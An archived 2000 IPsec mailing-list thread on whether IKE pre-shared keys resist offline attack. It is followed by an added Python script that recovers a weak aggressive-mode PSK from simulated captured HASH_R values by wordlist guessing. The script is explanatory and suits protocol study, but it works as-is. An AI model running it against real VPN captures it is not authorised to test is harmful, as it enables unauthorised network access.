
Re: Safety of pre-shared keys? (Re: Reliable delete notifies)



Note that the vulnerabilities of pre-shared key that you refer to
only apply to the case of a WEAK KEY (such as a password-derived key).
It says nothing about the security of the pre-shared mode (main
or aggressive) when using a strong key.
In such a case there is no security problem!
(There is always a security problem if you do not choose your keys
correctly or you do not know how to manage them securely).

In any case pre-shared mode (main or aggressive) was NOT designed to be
used with passwords. A password-based protocol needs a specialized design
(either a new mode for IKE or the proposals of ipsra).

Hugo

On Tue, 24 Oct 2000, Ari Huttunen wrote:

> Thanks, I think it helps. I really didn't have sufficient time to read it,
> but here's how I understood it:
> 
> Aggressive mode is vulnerable to off-line attacks against the pre-shared
> key because HASH_I contains enough information about it, and it's transmitted
> unencrypted. Main mode has no such vulnerability because HASH_I is transmitted
> encrypted.
> 
> So, informed GUESSING would produce the additional results:
> - Aggressive mode with 3rd msg. encrypted is still vulnerable since the same
>   information can probably be obtained from HASH_R.
> - Base mode has a similar vulnerability.
> 
> Ari
> 
> William Dixon wrote:
> > 
> > Ari, does John Pliam's paper answer your question on "what would it take
> > to fool authentication based on pre-shared keys" ?
> > 
> > http://www.ima.umn.edu/~pliam/xauth/
> > 
> > -----Original Message-----
> > From: Ari Huttunen [mailto:Ari.Huttunen@F-Secure.com]
> > Sent: Saturday, October 21, 2000 5:02 PM
> > To: Henry Spencer
> > Cc: Jan Vilhuber; ipsec
> > Subject: Safety of pre-shared keys? (Re: Reliable delete notifies)
> > 
> > Henry Spencer wrote:
> > >
> > > On Mon, 9 Oct 2000, Jan Vilhuber wrote:
> > > > With pure public keys, you need TWO of them. Granted, I can provision every
> > > > box with the same private key, which would make it equivalent to the above
> > > > group-pre-shared key scenario. But in reality you need two public keys,
> > > > where before you had a single pre-shared key.
> > >
> > > Consider them two halves of the same shared secret.  There's no fundamental
> > > difference...
> > 
> > Incorrect. With a pre-shared key you have one key that is secret. With public
> > keys, you have two keys, one of which is public, one is secret. I'm quite
> > sure everyone on this list knows this much..
> > 
> > Now, if you have that public key, you CAN give it to some mechanical calculator
> > for cracking. Eventually that machine will produce a result, and if it's based
> > on quantum computing you might actually get a result before the Big
> > Crash (if any).
> > 
> > Out of curiosity, what would one need to fool authentication based on
> > pre-shared keys, assuming only knowledge of things-on-the-wire? Would the
> > method learn the value of the pre-shared key or something else? (Would it
> > be safe against quantum computers?)
> > 
> > Ari
> > 
> > --
> > Ari Huttunen                   phone: +358 9 859 900
> > Senior Software Engineer       fax  : +358 9 8599 0452
> > 
> > F-Secure Corporation       http://www.F-Secure.com
> > 
> > F-Secure products: Integrated Solutions for Enterprise Security
> 
> -- 
> Ari Huttunen                   phone: +358 9 859 900
> Senior Software Engineer       fax  : +358 9 8599 0452
> 
> F-Secure Corporation       http://www.F-Secure.com 
> 
> F-Secure products: Integrated Solutions for Enterprise Security
> 
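
Both points in the thread above, Ari's (the HASH payloads are recomputable from the on-wire values plus the pre-shared key, so a passive observer can test guesses offline) and Hugo's (this only matters when the key is weak enough to be guessed), can be checked directly. The following is an added example, not code from the thread or from any IKE implementation. It uses the RFC 2409 formulas for the pre-shared-key authentication method with prf = HMAC-SHA1; the captured values, the identities and the wordlist are all constructed for the example, and the DH public values are random bytes of group-2 length rather than real g^x. The search is run against HASH_R, which aggressive mode always sends in the clear in message 2; HASH_I is the same computation with the operands swapped and is included for comparison.

```python
"""Offline dictionary attack against an IKEv1 aggressive-mode pre-shared key.

Added example (not code from the original thread).  RFC 2409, pre-shared-key
authentication, prf = HMAC-SHA1:

    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    HASH_I = prf(SKEYID, g^xi | g^xr | CKY-I | CKY-R | SAi_b | IDii_b)

Every operand except the PSK travels unencrypted in aggressive-mode messages
1 and 2 (HASH_I in message 3 as well, when that message is not encrypted).
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass

ID_FQDN = 2        # RFC 2407 identification types
ID_USER_FQDN = 3

# Constructed stand-in for a password dictionary.
WORDLIST = [b"password", b"letmein", b"cisco123", b"summer2000", b"vpnvpnvpn"]


@dataclass(frozen=True)
class AggressiveModeCapture:
    """What a passive observer records from aggressive-mode messages 1-3."""
    cky_i: bytes
    cky_r: bytes
    sai_b: bytes     # body of the initiator's SA payload
    g_xi: bytes      # initiator's DH public value
    g_xr: bytes      # responder's DH public value
    ni_b: bytes      # nonce payload bodies
    nr_b: bytes
    idii_b: bytes    # ID payload bodies (type, protocol, port, data)
    idir_b: bytes
    hash_r: bytes    # message 2, never encrypted
    hash_i: bytes    # message 3, assumed here to be sent in the clear


def prf(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    return prf(psk, ni_b + nr_b)


def hash_r(psk: bytes, c: AggressiveModeCapture) -> bytes:
    sk = skeyid_psk(psk, c.ni_b, c.nr_b)
    return prf(sk, c.g_xr + c.g_xi + c.cky_r + c.cky_i + c.sai_b + c.idir_b)


def hash_i(psk: bytes, c: AggressiveModeCapture) -> bytes:
    sk = skeyid_psk(psk, c.ni_b, c.nr_b)
    return prf(sk, c.g_xi + c.g_xr + c.cky_i + c.cky_r + c.sai_b + c.idii_b)


def id_body(id_type: int, data: bytes) -> bytes:
    """ID payload body: type, protocol id (0 = any), port (0 = any), data."""
    return bytes([id_type, 0, 0, 0]) + data


def simulate_exchange(psk: bytes) -> AggressiveModeCapture:
    """Stand-in for sniffing a real exchange: both peers hold `psk`, the
    observer records the public fields and the hashes the peers emit.
    All values are constructed; DH public values are random bytes, not g^x."""
    fields = dict(
        cky_i=secrets.token_bytes(8), cky_r=secrets.token_bytes(8),
        sai_b=secrets.token_bytes(48),   # constructed stand-in for the SA body
        g_xi=secrets.token_bytes(128), g_xr=secrets.token_bytes(128),
        ni_b=secrets.token_bytes(20), nr_b=secrets.token_bytes(20),
        idii_b=id_body(ID_USER_FQDN, b"roadwarrior@example.com"),
        idir_b=id_body(ID_FQDN, b"vpn-gw.example.com"),
    )
    partial = AggressiveModeCapture(hash_r=b"", hash_i=b"", **fields)
    return AggressiveModeCapture(hash_r=hash_r(psk, partial),
                                 hash_i=hash_i(psk, partial), **fields)


def crack_psk(c: AggressiveModeCapture, candidates):
    """Offline guess-and-check: two HMACs per candidate, no packets sent,
    no rate limiting or lockout by either peer.  Returns the PSK or None."""
    for guess in candidates:
        if hmac.compare_digest(hash_r(guess, c), c.hash_r):
            return guess
    return None


def random_strong_psk(nbytes: int = 32) -> bytes:
    """A 'strong key' in Hugo's sense: uniformly random bytes that no
    dictionary will ever contain."""
    return secrets.token_bytes(nbytes)


if __name__ == "__main__":
    weak = simulate_exchange(b"summer2000")
    print("weak PSK recovered:  ", crack_psk(weak, WORDLIST))
    strong = simulate_exchange(random_strong_psk())
    print("strong PSK recovered:", crack_psk(strong, WORDLIST))
```

The search cost is two HMACs per guess with nothing sent to either peer, so the only defence that survives an eavesdropper is the entropy of the pre-shared key itself: a password-derived key is found in seconds from a wordlist, while a 32-byte random key leaves the same loop with nothing, which is exactly the distinction drawn in the message above.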


